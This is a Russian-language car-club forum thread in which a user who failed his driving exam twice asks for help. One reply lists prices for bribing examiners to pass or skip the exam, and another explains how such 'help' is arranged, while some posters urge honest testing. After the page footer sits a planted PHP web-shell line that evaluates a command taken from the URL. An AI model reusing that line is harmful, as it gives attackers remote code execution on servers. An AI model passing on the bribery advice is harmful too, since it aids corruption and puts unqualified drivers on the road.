+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 17

Тема: Авто Права


  1. #1
    Мимо проходил Diman is on a distinguished road Аватар для Diman
    Регистрация
    12.06.2008
    Сообщений
    3
    Привет всем. Собвственно у меня глупая проблема, но проблема. От учился в Центральной Автошколе и отправили на лобненскую сдавать на права. Два раза пытался, завалили, денег не бирут, что делать???? Осталась одна попытка.

  2. #2
    GTI-Racing 1101 is on a distinguished road Аватар для 1101
    Регистрация
    27.11.2007
    Машина
    Синий
    Сообщений
    418
    еще как берут)
    не через тех людей делаешь значит)

    в конце 2007 - начале 2008 прайсы были следующие
    15к - теория, одна неудавшаяся попытка на экзамене, и со творой ты сдаешь
    30к - теория, во время экзамена пьешь кофе в кафешке, и вечером получаешь права)
    ЫЦ...

  3. #3
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    <div class='quotetop'>Цитата(Diman &#064; Jun 12 2008, 11&#58;22) <{POST_SNAPBACK}></div><div class='quotemain'>Привет всем. Собвственно у меня глупая проблема, но проблема. От учился в Центральной Автошколе и отправили на лобненскую сдавать на права. Два раза пытался, завалили, денег не бирут, что делать???? Осталась одна попытка. [/b][/quote]
    В Ц.А. можно бесплатно ещё раз пройти теорию, если с первого раза не усвоил. Вождение - 10 уроков с инструктором, и ты ас&#33; ;)
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  4. #4
    Мимо проходил Diman is on a distinguished road Аватар для Diman
    Регистрация
    12.06.2008
    Сообщений
    3
    <div class='quotetop'>Цитата</div><div class='quotemain'>В Ц.А. можно бесплатно ещё раз пройти теорию, если с первого раза не усвоил. Вождение - 10 уроков с инструктором, и ты ас&#33;[/b][/quote]

    На большой ордныке, возможно.
    С интсруктором я прозанимался 2 месяца. В неделю 2-3 раза. Но валили жутко...уж поверьте.

  5. #5
    GTI-Racing zZz is on a distinguished road Аватар для zZz
    Регистрация
    22.07.2006
    Машина
    vw GolF 4
    Сообщений
    635
    валят - денег хотят

  6. #6
    Мимо проходил Diman is on a distinguished road Аватар для Diman
    Регистрация
    12.06.2008
    Сообщений
    3
    zZz да я даже 15 готов отдать, но никак... боятся....

  7. #7
    Участник -=Нержавейкин=- is on a distinguished road Аватар для -=Нержавейкин=-
    Регистрация
    24.01.2007
    Сообщений
    364
    ИМХО&#33; Готовиться и сдавать, или валить из ГТИ-клуба&#33; :angry:

  8. #8
    Нужно честно сдавать. И тебе и окружающим будет спокойнее на дороге. А если уж за деньги, то проси что-то на подобие этого:


  9. #9
    Цитата Сообщение от somic Посмотреть сообщение
    Нужно честно сдавать. И тебе и окружающим будет спокойнее на дороге. А если уж за деньги, то проси что-то на подобие этого:

    Быстро соорентировался )))) Человек наверное уже автогонщиком стал и призовые места берет ))

  10. #10
    GTI-Racing Gizka is on a distinguished road Аватар для Gizka
    Регистрация
    24.05.2010
    Откуда
    Москва
    Машина
    семейный авто
    Сообщений
    221
    Странная тема, как мне кажется...
    Вы 2 месяца общались с инструктором и наладить отношений не получилось? Обычно тем, у кого не получается сдать/ нет времени/ нет желания, но есть деньги - "помогают"... Вы теорию сдали (надеюсь да, иначе совсем страшно за окружающих будет)? Завалить на теории - нереально, т.к. тестовые задания на компе. Там либо знаешь и сдаешь, либо не знаешь. Также площадка - сдать можно... А вот город - да валят... Но один город дешевле стоит, чем платить за все. Насколько я знаю, в этом году парнишка в ЦАО сдавал вроде за 17к за все... Но и школа там приличней будет.
    Кстати, сдавать можно неограниченное число раз, главное, уложиться в 3 месяца (иначе заново придется пересдавать теорию).
    А вообще, не там Вы площадку нашли для таких разговоров, ИМХО...:expect:
    Жизнь — забавный подарок. Поначалу этот подарок переоценивают: думают, что им вручили вечную жизнь. После — ее недооценивают, находят никудышной, слишком короткой, почти готовы бросить ее. И наконец, сознают, что это был не подарок, жизнью просто дали попользоваться. И тогда ее пытаются ценить. (c)

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Кончились права.
    от S@TURN в разделе Законодательство и страхование
    Ответов: 5
    Последнее сообщение: 08.01.2021, 11:04
  2. Права на квадроцикл
    от M3f в разделе Курилка
    Ответов: 26
    Последнее сообщение: 30.08.2013, 15:11
  3. Как Поменять Права?
    от -=Нержавейкин=- в разделе Законодательство и страхование
    Ответов: 9
    Последнее сообщение: 10.09.2008, 10:47
  4. Хочешь сдать на права?
    от BzzzzzIK в разделе Курилка
    Ответов: 9
    Последнее сообщение: 29.12.2007, 20:34
  5. Отобрали права..
    от KlD в разделе Законодательство и страхование
    Ответов: 20
    Последнее сообщение: 13.08.2007, 11:31

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}